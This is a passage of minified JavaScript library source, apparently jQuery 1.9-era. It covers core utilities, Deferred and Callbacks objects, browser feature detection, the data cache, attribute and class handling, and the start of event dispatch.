this.eq(0)},last:function(){return this.eq(-1)},eq:function(e){var t=this.length,n=+e+(0>e?t:0);return this.pushStack(n>=0&&t>n?[this[n]]:[])},map:function(e){return this.pushStack(b.map(this,function(t,n){return e.call(t,n,t)}))},end:function(){return this.prevObject||this.constructor(null)},push:d,sort:[].sort,splice:[].splice},b.fn.init.prototype=b.fn,b.extend=b.fn.extend=function(){var e,n,r,i,o,a,s=arguments[0]||{},u=1,l=arguments.length,c=!1;for("boolean"==typeof s&&(c=s,s=arguments[1]||{},u=2),"object"==typeof s||b.isFunction(s)||(s={}),l===u&&(s=this,--u);l>u;u++)if(null!=(o=arguments[u]))for(i in o)e=s[i],r=o[i],s!==r&&(c&&r&&(b.isPlainObject(r)||(n=b.isArray(r)))?(n?(n=!1,a=e&&b.isArray(e)?e:[]):a=e&&b.isPlainObject(e)?e:{},s[i]=b.extend(c,a,r)):r!==t&&(s[i]=r));return s},b.extend({noConflict:function(t){return e.$===b&&(e.$=u),t&&e.jQuery===b&&(e.jQuery=s),b},isReady:!1,readyWait:1,holdReady:function(e){e?b.readyWait++:b.ready(!0)},ready:function(e){if(e===!0?!--b.readyWait:!b.isReady){if(!o.body)return setTimeout(b.ready);b.isReady=!0,e!==!0&&--b.readyWait>0||(n.resolveWith(o,[b]),b.fn.trigger&&b(o).trigger("ready").off("ready"))}},isFunction:function(e){return"function"===b.type(e)},isArray:Array.isArray||function(e){return"array"===b.type(e)},isWindow:function(e){return null!=e&&e==e.window},isNumeric:function(e){return!isNaN(parseFloat(e))&&isFinite(e)},type:function(e){return null==e?e+"":"object"==typeof e||"function"==typeof e?l[m.call(e)]||"object":typeof e},isPlainObject:function(e){if(!e||"object"!==b.type(e)||e.nodeType||b.isWindow(e))return!1;try{if(e.constructor&&!y.call(e,"constructor")&&!y.call(e.constructor.prototype,"isPrototypeOf"))return!1}catch(n){return!1}var r;for(r in e);return r===t||y.call(e,r)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},error:function(e){throw Error(e)},parseHTML:function(e,t,n){if(!e||"string"!=typeof e)return null;"boolean"==typeof t&&(n=t,t=!1),t=t||o;var r=C.exec(e),i=!n&&[];return r?[t.createElement(r[1])]:(r=b.buildFragment([e],t,i),i&&b(i).remove(),b.merge([],r.childNodes))},parseJSON:function(n){return e.JSON&&e.JSON.parse?e.JSON.parse(n):null===n?n:"string"==typeof n&&(n=b.trim(n),n&&k.test(n.replace(S,"@").replace(A,"]").replace(E,"")))?Function("return "+n)():(b.error("Invalid JSON: "+n),t)},parseXML:function(n){var r,i;if(!n||"string"!=typeof n)return null;try{e.DOMParser?(i=new DOMParser,r=i.parseFromString(n,"text/xml")):(r=new ActiveXObject("Microsoft.XMLDOM"),r.async="false",r.loadXML(n))}catch(o){r=t}return r&&r.documentElement&&!r.getElementsByTagName("parsererror").length||b.error("Invalid XML: "+n),r},noop:function(){},globalEval:function(t){t&&b.trim(t)&&(e.execScript||function(t){e.eval.call(e,t)})(t)},camelCase:function(e){return e.replace(j,"ms-").replace(D,L)},nodeName:function(e,t){return e.nodeName&&e.nodeName.toLowerCase()===t.toLowerCase()},each:function(e,t,n){var r,i=0,o=e.length,a=M(e);if(n){if(a){for(;o>i;i++)if(r=t.apply(e[i],n),r===!1)break}else for(i in e)if(r=t.apply(e[i],n),r===!1)break}else if(a){for(;o>i;i++)if(r=t.call(e[i],i,e[i]),r===!1)break}else for(i in e)if(r=t.call(e[i],i,e[i]),r===!1)break;return e},trim:v&&!v.call("\ufeff\u00a0")?function(e){return null==e?"":v.call(e)}:function(e){return null==e?"":(e+"").replace(T,"")},makeArray:function(e,t){var n=t||[];return null!=e&&(M(Object(e))?b.merge(n,"string"==typeof e?[e]:e):d.call(n,e)),n},inArray:function(e,t,n){var r;if(t){if(g)return g.call(t,e,n);for(r=t.length,n=n?0>n?Math.max(0,r+n):n:0;r>n;n++)if(n in t&&t[n]===e)return n}return-1},merge:function(e,n){var r=n.length,i=e.length,o=0;if("number"==typeof r)for(;r>o;o++)e[i++]=n[o];else while(n[o]!==t)e[i++]=n[o++];return e.length=i,e},grep:function(e,t,n){var r,i=[],o=0,a=e.length;for(n=!!n;a>o;o++)r=!!t(e[o],o),n!==r&&i.push(e[o]);return i},map:function(e,t,n){var r,i=0,o=e.length,a=M(e),s=[];if(a)for(;o>i;i++)r=t(e[i],i,n),null!=r&&(s[s.length]=r);else for(i in e)r=t(e[i],i,n),null!=r&&(s[s.length]=r);return f.apply([],s)},guid:1,proxy:function(e,n){var r,i,o;return"string"==typeof n&&(o=e[n],n=e,e=o),b.isFunction(e)?(r=h.call(arguments,2),i=function(){return e.apply(n||this,r.concat(h.call(arguments)))},i.guid=e.guid=e.guid||b.guid++,i):t},access:function(e,n,r,i,o,a,s){var u=0,l=e.length,c=null==r;if("object"===b.type(r)){o=!0;for(u in r)b.access(e,n,u,r[u],!0,a,s)}else if(i!==t&&(o=!0,b.isFunction(i)||(s=!0),c&&(s?(n.call(e,i),n=null):(c=n,n=function(e,t,n){return c.call(b(e),n)})),n))for(;l>u;u++)n(e[u],r,s?i:i.call(e[u],u,n(e[u],r)));return o?e:c?n.call(e):l?n(e[0],r):a},now:function(){return(new Date).getTime()}}),b.ready.promise=function(t){if(!n)if(n=b.Deferred(),"complete"===o.readyState)setTimeout(b.ready);else if(o.addEventListener)o.addEventListener("DOMContentLoaded",H,!1),e.addEventListener("load",H,!1);else{o.attachEvent("onreadystatechange",H),e.attachEvent("onload",H);var r=!1;try{r=null==e.frameElement&&o.documentElement}catch(i){}r&&r.doScroll&&function a(){if(!b.isReady){try{r.doScroll("left")}catch(e){return setTimeout(a,50)}q(),b.ready()}}()}return n.promise(t)},b.each("Boolean Number String Function Array Date RegExp Object Error".split(" "),function(e,t){l["[object "+t+"]"]=t.toLowerCase()});function M(e){var t=e.length,n=b.type(e);return b.isWindow(e)?!1:1===e.nodeType&&t?!0:"array"===n||"function"!==n&&(0===t||"number"==typeof t&&t>0&&t-1 in e)}r=b(o);var _={};function F(e){var t=_[e]={};return b.each(e.match(w)||[],function(e,n){t[n]=!0}),t}b.Callbacks=function(e){e="string"==typeof e?_[e]||F(e):b.extend({},e);var n,r,i,o,a,s,u=[],l=!e.once&&[],c=function(t){for(r=e.memory&&t,i=!0,a=s||0,s=0,o=u.length,n=!0;u&&o>a;a++)if(u[a].apply(t[0],t[1])===!1&&e.stopOnFalse){r=!1;break}n=!1,u&&(l?l.length&&c(l.shift()):r?u=[]:p.disable())},p={add:function(){if(u){var t=u.length;(function i(t){b.each(t,function(t,n){var r=b.type(n);"function"===r?e.unique&&p.has(n)||u.push(n):n&&n.length&&"string"!==r&&i(n)})})(arguments),n?o=u.length:r&&(s=t,c(r))}return this},remove:function(){return u&&b.each(arguments,function(e,t){var r;while((r=b.inArray(t,u,r))>-1)u.splice(r,1),n&&(o>=r&&o--,a>=r&&a--)}),this},has:function(e){return e?b.inArray(e,u)>-1:!(!u||!u.length)},empty:function(){return u=[],this},disable:function(){return u=l=r=t,this},disabled:function(){return!u},lock:function(){return l=t,r||p.disable(),this},locked:function(){return!l},fireWith:function(e,t){return t=t||[],t=[e,t.slice?t.slice():t],!u||i&&!l||(n?l.push(t):c(t)),this},fire:function(){return p.fireWith(this,arguments),this},fired:function(){return!!i}};return p},b.extend({Deferred:function(e){var t=[["resolve","done",b.Callbacks("once memory"),"resolved"],["reject","fail",b.Callbacks("once memory"),"rejected"],["notify","progress",b.Callbacks("memory")]],n="pending",r={state:function(){return n},always:function(){return i.done(arguments).fail(arguments),this},then:function(){var e=arguments;return b.Deferred(function(n){b.each(t,function(t,o){var a=o[0],s=b.isFunction(e[t])&&e[t];i[o[1]](function(){var e=s&&s.apply(this,arguments);e&&b.isFunction(e.promise)?e.promise().done(n.resolve).fail(n.reject).progress(n.notify):n[a+"With"](this===r?n.promise():this,s?[e]:arguments)})}),e=null}).promise()},promise:function(e){return null!=e?b.extend(e,r):r}},i={};return r.pipe=r.then,b.each(t,function(e,o){var a=o[2],s=o[3];r[o[1]]=a.add,s&&a.add(function(){n=s},t[1^e][2].disable,t[2][2].lock),i[o[0]]=function(){return i[o[0]+"With"](this===i?r:this,arguments),this},i[o[0]+"With"]=a.fireWith}),r.promise(i),e&&e.call(i,i),i},when:function(e){var t=0,n=h.call(arguments),r=n.length,i=1!==r||e&&b.isFunction(e.promise)?r:0,o=1===i?e:b.Deferred(),a=function(e,t,n){return function(r){t[e]=this,n[e]=arguments.length>1?h.call(arguments):r,n===s?o.notifyWith(t,n):--i||o.resolveWith(t,n)}},s,u,l;if(r>1)for(s=Array(r),u=Array(r),l=Array(r);r>t;t++)n[t]&&b.isFunction(n[t].promise)?n[t].promise().done(a(t,l,n)).fail(o.reject).progress(a(t,u,s)):--i;return i||o.resolveWith(l,n),o.promise()}}),b.support=function(){var t,n,r,a,s,u,l,c,p,f,d=o.createElement("div");if(d.setAttribute("className","t"),d.innerHTML="  <link/><table></table><a href='/a'>a</a><input type='checkbox'/>",n=d.getElementsByTagName("*"),r=d.getElementsByTagName("a")[0],!n||!r||!n.length)return{};s=o.createElement("select"),l=s.appendChild(o.createElement("option")),a=d.getElementsByTagName("input")[0],r.style.cssText="top:1px;float:left;opacity:.5",t={getSetAttribute:"t"!==d.className,leadingWhitespace:3===d.firstChild.nodeType,tbody:!d.getElementsByTagName("tbody").length,htmlSerialize:!!d.getElementsByTagName("link").length,style:/top/.test(r.getAttribute("style")),hrefNormalized:"/a"===r.getAttribute("href"),opacity:/^0.5/.test(r.style.opacity),cssFloat:!!r.style.cssFloat,checkOn:!!a.value,optSelected:l.selected,enctype:!!o.createElement("form").enctype,html5Clone:"<:nav></:nav>"!==o.createElement("nav").cloneNode(!0).outerHTML,boxModel:"CSS1Compat"===o.compatMode,deleteExpando:!0,noCloneEvent:!0,inlineBlockNeedsLayout:!1,shrinkWrapBlocks:!1,reliableMarginRight:!0,boxSizingReliable:!0,pixelPosition:!1},a.checked=!0,t.noCloneChecked=a.cloneNode(!0).checked,s.disabled=!0,t.optDisabled=!l.disabled;try{delete d.test}catch(h){t.deleteExpando=!1}a=o.createElement("input"),a.setAttribute("value",""),t.input=""===a.getAttribute("value"),a.value="t",a.setAttribute("type","radio"),t.radioValue="t"===a.value,a.setAttribute("checked","t"),a.setAttribute("name","t"),u=o.createDocumentFragment(),u.appendChild(a),t.appendChecked=a.checked,t.checkClone=u.cloneNode(!0).cloneNode(!0).lastChild.checked,d.attachEvent&&(d.attachEvent("onclick",function(){t.noCloneEvent=!1}),d.cloneNode(!0).click());for(f in{submit:!0,change:!0,focusin:!0})d.setAttribute(c="on"+f,"t"),t[f+"Bubbles"]=c in e||d.attributes[c].expando===!1;return d.style.backgroundClip="content-box",d.cloneNode(!0).style.backgroundClip="",t.clearCloneStyle="content-box"===d.style.backgroundClip,b(function(){var n,r,a,s="padding:0;margin:0;border:0;display:block;box-sizing:content-box;-moz-box-sizing:content-box;-webkit-box-sizing:content-box;",u=o.getElementsByTagName("body")[0];u&&(n=o.createElement("div"),n.style.cssText="border:0;width:0;height:0;position:absolute;top:0;left:-9999px;margin-top:1px",u.appendChild(n).appendChild(d),d.innerHTML="<table><tr><td></td><td>t</td></tr></table>",a=d.getElementsByTagName("td"),a[0].style.cssText="padding:0;margin:0;border:0;display:none",p=0===a[0].offsetHeight,a[0].style.display="",a[1].style.display="none",t.reliableHiddenOffsets=p&&0===a[0].offsetHeight,d.innerHTML="",d.style.cssText="box-sizing:border-box;-moz-box-sizing:border-box;-webkit-box-sizing:border-box;padding:1px;border:1px;display:block;width:4px;margin-top:1%;position:absolute;top:1%;",t.boxSizing=4===d.offsetWidth,t.doesNotIncludeMarginInBodyOffset=1!==u.offsetTop,e.getComputedStyle&&(t.pixelPosition="1%"!==(e.getComputedStyle(d,null)||{}).top,t.boxSizingReliable="4px"===(e.getComputedStyle(d,null)||{width:"4px"}).width,r=d.appendChild(o.createElement("div")),r.style.cssText=d.style.cssText=s,r.style.marginRight=r.style.width="0",d.style.width="1px",t.reliableMarginRight=!parseFloat((e.getComputedStyle(r,null)||{}).marginRight)),typeof d.style.zoom!==i&&(d.innerHTML="",d.style.cssText=s+"width:1px;padding:1px;display:inline;zoom:1",t.inlineBlockNeedsLayout=3===d.offsetWidth,d.style.display="block",d.innerHTML="<div></div>",d.firstChild.style.width="5px",t.shrinkWrapBlocks=3!==d.offsetWidth,t.inlineBlockNeedsLayout&&(u.style.zoom=1)),u.removeChild(n),n=d=a=r=null)}),n=s=u=l=r=a=null,t}();var O=/(?:\{[\s\S]*\}|\[[\s\S]*\])$/,B=/([A-Z])/g;function P(e,n,r,i){if(b.acceptData(e)){var o,a,s=b.expando,u="string"==typeof n,l=e.nodeType,p=l?b.cache:e,f=l?e[s]:e[s]&&s;if(f&&p[f]&&(i||p[f].data)||!u||r!==t)return f||(l?e[s]=f=c.pop()||b.guid++:f=s),p[f]||(p[f]={},l||(p[f].toJSON=b.noop)),("object"==typeof n||"function"==typeof n)&&(i?p[f]=b.extend(p[f],n):p[f].data=b.extend(p[f].data,n)),o=p[f],i||(o.data||(o.data={}),o=o.data),r!==t&&(o[b.camelCase(n)]=r),u?(a=o[n],null==a&&(a=o[b.camelCase(n)])):a=o,a}}function R(e,t,n){if(b.acceptData(e)){var r,i,o,a=e.nodeType,s=a?b.cache:e,u=a?e[b.expando]:b.expando;if(s[u]){if(t&&(o=n?s[u]:s[u].data)){b.isArray(t)?t=t.concat(b.map(t,b.camelCase)):t in o?t=[t]:(t=b.camelCase(t),t=t in o?[t]:t.split(" "));for(r=0,i=t.length;i>r;r++)delete o[t[r]];if(!(n?$:b.isEmptyObject)(o))return}(n||(delete s[u].data,$(s[u])))&&(a?b.cleanData([e],!0):b.support.deleteExpando||s!=s.window?delete s[u]:s[u]=null)}}}b.extend({cache:{},expando:"jQuery"+(p+Math.random()).replace(/\D/g,""),noData:{embed:!0,object:"clsid:D27CDB6E-AE6D-11cf-96B8-444553540000",applet:!0},hasData:function(e){return e=e.nodeType?b.cache[e[b.expando]]:e[b.expando],!!e&&!$(e)},data:function(e,t,n){return P(e,t,n)},removeData:function(e,t){return R(e,t)},_data:function(e,t,n){return P(e,t,n,!0)},_removeData:function(e,t){return R(e,t,!0)},acceptData:function(e){if(e.nodeType&&1!==e.nodeType&&9!==e.nodeType)return!1;var t=e.nodeName&&b.noData[e.nodeName.toLowerCase()];return!t||t!==!0&&e.getAttribute("classid")===t}}),b.fn.extend({data:function(e,n){var r,i,o=this[0],a=0,s=null;if(e===t){if(this.length&&(s=b.data(o),1===o.nodeType&&!b._data(o,"parsedAttrs"))){for(r=o.attributes;r.length>a;a++)i=r[a].name,i.indexOf("data-")||(i=b.camelCase(i.slice(5)),W(o,i,s[i]));b._data(o,"parsedAttrs",!0)}return s}return"object"==typeof e?this.each(function(){b.data(this,e)}):b.access(this,function(n){return n===t?o?W(o,e,b.data(o,e)):null:(this.each(function(){b.data(this,e,n)}),t)},null,n,arguments.length>1,null,!0)},removeData:function(e){return this.each(function(){b.removeData(this,e)})}});function W(e,n,r){if(r===t&&1===e.nodeType){var i="data-"+n.replace(B,"-$1").toLowerCase();if(r=e.getAttribute(i),"string"==typeof r){try{r="true"===r?!0:"false"===r?!1:"null"===r?null:+r+""===r?+r:O.test(r)?b.parseJSON(r):r}catch(o){}b.data(e,n,r)}else r=t}return r}function $(e){var t;for(t in e)if(("data"!==t||!b.isEmptyObject(e[t]))&&"toJSON"!==t)return!1;return!0}b.extend({queue:function(e,n,r){var i;return e?(n=(n||"fx")+"queue",i=b._data(e,n),r&&(!i||b.isArray(r)?i=b._data(e,n,b.makeArray(r)):i.push(r)),i||[]):t},dequeue:function(e,t){t=t||"fx";var n=b.queue(e,t),r=n.length,i=n.shift(),o=b._queueHooks(e,t),a=function(){b.dequeue(e,t)};"inprogress"===i&&(i=n.shift(),r--),o.cur=i,i&&("fx"===t&&n.unshift("inprogress"),delete o.stop,i.call(e,a,o)),!r&&o&&o.empty.fire()},_queueHooks:function(e,t){var n=t+"queueHooks";return b._data(e,n)||b._data(e,n,{empty:b.Callbacks("once memory").add(function(){b._removeData(e,t+"queue"),b._removeData(e,n)})})}}),b.fn.extend({queue:function(e,n){var r=2;return"string"!=typeof e&&(n=e,e="fx",r--),r>arguments.length?b.queue(this[0],e):n===t?this:this.each(function(){var t=b.queue(this,e,n);b._queueHooks(this,e),"fx"===e&&"inprogress"!==t[0]&&b.dequeue(this,e)})},dequeue:function(e){return this.each(function(){b.dequeue(this,e)})},delay:function(e,t){return e=b.fx?b.fx.speeds[e]||e:e,t=t||"fx",this.queue(t,function(t,n){var r=setTimeout(t,e);n.stop=function(){clearTimeout(r)}})},clearQueue:function(e){return this.queue(e||"fx",[])},promise:function(e,n){var r,i=1,o=b.Deferred(),a=this,s=this.length,u=function(){--i||o.resolveWith(a,[a])};"string"!=typeof e&&(n=e,e=t),e=e||"fx";while(s--)r=b._data(a[s],e+"queueHooks"),r&&r.empty&&(i++,r.empty.add(u));return u(),o.promise(n)}});var I,z,X=/[\t\r\n]/g,U=/\r/g,V=/^(?:input|select|textarea|button|object)$/i,Y=/^(?:a|area)$/i,J=/^(?:checked|selected|autofocus|autoplay|async|controls|defer|disabled|hidden|loop|multiple|open|readonly|required|scoped)$/i,G=/^(?:checked|selected)$/i,Q=b.support.getSetAttribute,K=b.support.input;b.fn.extend({attr:function(e,t){return b.access(this,b.attr,e,t,arguments.length>1)},removeAttr:function(e){return this.each(function(){b.removeAttr(this,e)})},prop:function(e,t){return b.access(this,b.prop,e,t,arguments.length>1)},removeProp:function(e){return e=b.propFix[e]||e,this.each(function(){try{this[e]=t,delete this[e]}catch(n){}})},addClass:function(e){var t,n,r,i,o,a=0,s=this.length,u="string"==typeof e&&e;if(b.isFunction(e))return this.each(function(t){b(this).addClass(e.call(this,t,this.className))});if(u)for(t=(e||"").match(w)||[];s>a;a++)if(n=this[a],r=1===n.nodeType&&(n.className?(" "+n.className+" ").replace(X," "):" ")){o=0;while(i=t[o++])0>r.indexOf(" "+i+" ")&&(r+=i+" ");n.className=b.trim(r)}return this},removeClass:function(e){var t,n,r,i,o,a=0,s=this.length,u=0===arguments.length||"string"==typeof e&&e;if(b.isFunction(e))return this.each(function(t){b(this).removeClass(e.call(this,t,this.className))});if(u)for(t=(e||"").match(w)||[];s>a;a++)if(n=this[a],r=1===n.nodeType&&(n.className?(" "+n.className+" ").replace(X," "):"")){o=0;while(i=t[o++])while(r.indexOf(" "+i+" ")>=0)r=r.replace(" "+i+" "," ");n.className=e?b.trim(r):""}return this},toggleClass:function(e,t){var n=typeof e,r="boolean"==typeof t;return b.isFunction(e)?this.each(function(n){b(this).toggleClass(e.call(this,n,this.className,t),t)}):this.each(function(){if("string"===n){var o,a=0,s=b(this),u=t,l=e.match(w)||[];while(o=l[a++])u=r?u:!s.hasClass(o),s[u?"addClass":"removeClass"](o)}else(n===i||"boolean"===n)&&(this.className&&b._data(this,"__className__",this.className),this.className=this.className||e===!1?"":b._data(this,"__className__")||"")})},hasClass:function(e){var t=" "+e+" ",n=0,r=this.length;for(;r>n;n++)if(1===this[n].nodeType&&(" "+this[n].className+" ").replace(X," ").indexOf(t)>=0)return!0;return!1},val:function(e){var n,r,i,o=this[0];{if(arguments.length)return i=b.isFunction(e),this.each(function(n){var o,a=b(this);1===this.nodeType&&(o=i?e.call(this,n,a.val()):e,null==o?o="":"number"==typeof o?o+="":b.isArray(o)&&(o=b.map(o,function(e){return null==e?"":e+""})),r=b.valHooks[this.type]||b.valHooks[this.nodeName.toLowerCase()],r&&"set"in r&&r.set(this,o,"value")!==t||(this.value=o))});if(o)return r=b.valHooks[o.type]||b.valHooks[o.nodeName.toLowerCase()],r&&"get"in r&&(n=r.get(o,"value"))!==t?n:(n=o.value,"string"==typeof n?n.replace(U,""):null==n?"":n)}}}),b.extend({valHooks:{option:{get:function(e){var t=e.attributes.value;return!t||t.specified?e.value:e.text}},select:{get:function(e){var t,n,r=e.options,i=e.selectedIndex,o="select-one"===e.type||0>i,a=o?null:[],s=o?i+1:r.length,u=0>i?s:o?i:0;for(;s>u;u++)if(n=r[u],!(!n.selected&&u!==i||(b.support.optDisabled?n.disabled:null!==n.getAttribute("disabled"))||n.parentNode.disabled&&b.nodeName(n.parentNode,"optgroup"))){if(t=b(n).val(),o)return t;a.push(t)}return a},set:function(e,t){var n=b.makeArray(t);return b(e).find("option").each(function(){this.selected=b.inArray(b(this).val(),n)>=0}),n.length||(e.selectedIndex=-1),n}}},attr:function(e,n,r){var o,a,s,u=e.nodeType;if(e&&3!==u&&8!==u&&2!==u)return typeof e.getAttribute===i?b.prop(e,n,r):(a=1!==u||!b.isXMLDoc(e),a&&(n=n.toLowerCase(),o=b.attrHooks[n]||(J.test(n)?z:I)),r===t?o&&a&&"get"in o&&null!==(s=o.get(e,n))?s:(typeof e.getAttribute!==i&&(s=e.getAttribute(n)),null==s?t:s):null!==r?o&&a&&"set"in o&&(s=o.set(e,r,n))!==t?s:(e.setAttribute(n,r+""),r):(b.removeAttr(e,n),t))},removeAttr:function(e,t){var n,r,i=0,o=t&&t.match(w);if(o&&1===e.nodeType)while(n=o[i++])r=b.propFix[n]||n,J.test(n)?!Q&&G.test(n)?e[b.camelCase("default-"+n)]=e[r]=!1:e[r]=!1:b.attr(e,n,""),e.removeAttribute(Q?n:r)},attrHooks:{type:{set:function(e,t){if(!b.support.radioValue&&"radio"===t&&b.nodeName(e,"input")){var n=e.value;return e.setAttribute("type",t),n&&(e.value=n),t}}}},propFix:{tabindex:"tabIndex",readonly:"readOnly","for":"htmlFor","class":"className",maxlength:"maxLength",cellspacing:"cellSpacing",cellpadding:"cellPadding",rowspan:"rowSpan",colspan:"colSpan",usemap:"useMap",frameborder:"frameBorder",contenteditable:"contentEditable"},prop:function(e,n,r){var i,o,a,s=e.nodeType;if(e&&3!==s&&8!==s&&2!==s)return a=1!==s||!b.isXMLDoc(e),a&&(n=b.propFix[n]||n,o=b.propHooks[n]),r!==t?o&&"set"in o&&(i=o.set(e,r,n))!==t?i:e[n]=r:o&&"get"in o&&null!==(i=o.get(e,n))?i:e[n]},propHooks:{tabIndex:{get:function(e){var n=e.getAttributeNode("tabindex");return n&&n.specified?parseInt(n.value,10):V.test(e.nodeName)||Y.test(e.nodeName)&&e.href?0:t}}}}),z={get:function(e,n){var r=b.prop(e,n),i="boolean"==typeof r&&e.getAttribute(n),o="boolean"==typeof r?K&&Q?null!=i:G.test(n)?e[b.camelCase("default-"+n)]:!!i:e.getAttributeNode(n);return o&&o.value!==!1?n.toLowerCase():t},set:function(e,t,n){return t===!1?b.removeAttr(e,n):K&&Q||!G.test(n)?e.setAttribute(!Q&&b.propFix[n]||n,n):e[b.camelCase("default-"+n)]=e[n]=!0,n}},K&&Q||(b.attrHooks.value={get:function(e,n){var r=e.getAttributeNode(n);return b.nodeName(e,"input")?e.defaultValue:r&&r.specified?r.value:t},set:function(e,n,r){return b.nodeName(e,"input")?(e.defaultValue=n,t):I&&I.set(e,n,r)}}),Q||(I=b.valHooks.button={get:function(e,n){var r=e.getAttributeNode(n);return r&&("id"===n||"name"===n||"coords"===n?""!==r.value:r.specified)?r.value:t},set:function(e,n,r){var i=e.getAttributeNode(r);return i||e.setAttributeNode(i=e.ownerDocument.createAttribute(r)),i.value=n+="","value"===r||n===e.getAttribute(r)?n:t}},b.attrHooks.contenteditable={get:I.get,set:function(e,t,n){I.set(e,""===t?!1:t,n)}},b.each(["width","height"],function(e,n){b.attrHooks[n]=b.extend(b.attrHooks[n],{set:function(e,r){return""===r?(e.setAttribute(n,"auto"),r):t}})})),b.support.hrefNormalized||(b.each(["href","src","width","height"],function(e,n){b.attrHooks[n]=b.extend(b.attrHooks[n],{get:function(e){var r=e.getAttribute(n,2);return null==r?t:r}})}),b.each(["href","src"],function(e,t){b.propHooks[t]={get:function(e){return e.getAttribute(t,4)}}})),b.support.style||(b.attrHooks.style={get:function(e){return e.style.cssText||t},set:function(e,t){return e.style.cssText=t+""}}),b.support.optSelected||(b.propHooks.selected=b.extend(b.propHooks.selected,{get:function(e){var t=e.parentNode;return t&&(t.selectedIndex,t.parentNode&&t.parentNode.selectedIndex),null}})),b.support.enctype||(b.propFix.enctype="encoding"),b.support.checkOn||b.each(["radio","checkbox"],function(){b.valHooks[this]={get:function(e){return null===e.getAttribute("value")?"on":e.value}}}),b.each(["radio","checkbox"],function(){b.valHooks[this]=b.extend(b.valHooks[this],{set:function(e,n){return b.isArray(n)?e.checked=b.inArray(b(e).val(),n)>=0:t}})});var Z=/^(?:input|select|textarea)$/i,et=/^key/,tt=/^(?:mouse|contextmenu)|click/,nt=/^(?:focusinfocus|focusoutblur)$/,rt=/^([^.]*)(?:\.(.+)|)$/;function it(){return!0}function ot(){return!1}b.event={global:{},add:function(e,n,r,o,a){var s,u,l,c,p,f,d,h,g,m,y,v=b._data(e);if(v){r.handler&&(c=r,r=c.handler,a=c.selector),r.guid||(r.guid=b.guid++),(u=v.events)||(u=v.events={}),(f=v.handle)||(f=v.handle=function(e){return typeof b===i||e&&b.event.triggered===e.type?t:b.event.dispatch.apply(f.elem,arguments)},f.elem=e),n=(n||"").match(w)||[""],l=n.length;while(l--)s=rt.exec(n[l])||[],g=y=s[1],m=(s[2]||"").split(".").sort(),p=b.event.special[g]||{},g=(a?p.delegateType:p.bindType)||g,p=b.event.special[g]||{},d=b.extend({type:g,origType:y,data:o,handler:r,guid:r.guid,selector:a,needsContext:a&&b.expr.match.needsContext.test(a),namespace:m.join(".")},c),(h=u[g])||(h=u[g]=[],h.delegateCount=0,p.setup&&p.setup.call(e,o,m,f)!==!1||(e.addEventListener?e.addEventListener(g,f,!1):e.attachEvent&&e.attachEvent("on"+g,f))),p.add&&(p.add.call(e,d),d.handler.guid||(d.handler.guid=r.guid)),a?h.splice(h.delegateCount++,0,d):h.push(d),b.event.global[g]=!0;e=null}},remove:function(e,t,n,r,i){var o,a,s,u,l,c,p,f,d,h,g,m=b.hasData(e)&&b._data(e);if(m&&(c=m.events)){t=(t||"").match(w)||[""],l=t.length;while(l--)if(s=rt.exec(t[l])||[],d=g=s[1],h=(s[2]||"").split(".").sort(),d){p=b.event.special[d]||{},d=(r?p.delegateType:p.bindType)||d,f=c[d]||[],s=s[2]&&RegExp("(^|\\.)"+h.join("\\.(?:.*\\.|)")+"(\\.|$)"),u=o=f.length;while(o--)a=f[o],!i&&g!==a.origType||n&&n.guid!==a.guid||s&&!s.test(a.namespace)||r&&r!==a.selector&&("**"!==r||!a.selector)||(f.splice(o,1),a.selector&&f.delegateCount--,p.remove&&p.remove.call(e,a));u&&!f.length&&(p.teardown&&p.teardown.call(e,h,m.handle)!==!1||b.removeEvent(e,d,m.handle),delete c[d])}else for(d in c)b.event.remove(e,d+t[l],n,r,!0);b.isEmptyObject(c)&&(delete m.handle,b._removeData(e,"events"))}},trigger:function(n,r,i,a){var s,u,l,c,p,f,d,h=[i||o],g=y.call(n,"type")?n.type:n,m=y.call(n,"namespace")?n.namespace.split("."):[];if(l=f=i=i||o,3!==i.nodeType&&8!==i.nodeType&&!nt.test(g+b.event.triggered)&&(g.indexOf(".")>=0&&(m=g.split("."),g=m.shift(),m.sort()),u=0>g.indexOf(":")&&"on"+g,n=n[b.expando]?n:new b.Event(g,"object"==typeof n&&n),n.isTrigger=!0,n.namespace=m.join("."),n.namespace_re=n.namespace?RegExp("(^|\\.)"+m.join("\\.(?:.*\\.|)")+"(\\.|$)"):null,n.result=t,n.target||(n.target=i),r=null==r?[n]:b.makeArray(r,[n]),p=b.event.special[g]||{},a||!p.trigger||p.trigger.apply(i,r)!==!1)){if(!a&&!p.noBubble&&!b.isWindow(i)){for(c=p.delegateType||g,nt.test(c+g)||(l=l.parentNode);l;l=l.parentNode)h.push(l),f=l;f===(i.ownerDocument||o)&&h.push(f.defaultView||f.parentWindow||e)}d=0;while((l=h[d++])&&!n.isPropagationStopped())n.type=d>1?c:p.bindType||g,s=(b._data(l,"events")||{})[n.type]&&b._data(l,"handle"),s&&s.apply(l,r),s=u&&l[u],s&&b.acceptData(l)&&s.apply&&s.apply(l,r)===!1&&n.preventDefault();if(n.type=g,!(a||n.isDefaultPrevented()||p._default&&p._default.apply(i.ownerDocument,r)!==!1||"click"===g&&b.nodeName(i,"a")||!b.acceptData(i)||!u||!i[g]||b.isWindow(i))){f=i[u],f&&(i[u]=null),b.event.triggered=g;try{i[g]()}catch(v){}b.event.triggered=t,f&&(i[u]=f)}return n.result}},dispatch:function(e){e=b.event.fix(e);var n,r,i,o,a,s=[],u=h.call(arguments),l=(b._data(this,"events")||{})[e.type]||[],c=b.event.special[e.type]||{};if(u[0]=e,e.delegateTarget=this,!c.preDispatch||c.preDispatch.call(this,e)!==!1){s=b.event.handlers.call(this,e,l),n=0;while((o=s[n++])&&!e.isPropagationStopped()){e.currentTarget=o.elem,a=0;while((i=o.handlers[a++])&&!e.isImmediatePropagationStopped())(!e.namespace_re||e.namespace_re.test(i.namespace))&&(e.handleObj=i,e.data=i.data,r=((b.event.special[i.origType]||{}).handle||i.handler).apply(o.elem,u),r!==t&&(e.result=r)===!1&&(e.preventDefault(),e.stopPropagation()))}return c.postDispatch&&c.postDispatch.call(this,e),e.result}},handlers:function(e,n){var r,i,o,a,s=[],u=n.delegateCount,l=e.target;if(u&&l.nodeType&&(!e.button||"click"!==e.type))for(;l!=this;l=l.parentNode||this)if(1===l.nodeType&&(l.disabled!==!0||"click"!==e.type)){for(o=[],a=0;u>a;a++)i=n[a],r=i.selector+" ",o[r]===t&&(o[r]=i.needsContext?b(r,this).index(l)>=0:b.find(r,this,null,[l]).length),o[r]&&o.push(i);o.length&&s.push({elem:l,handlers:o})}return 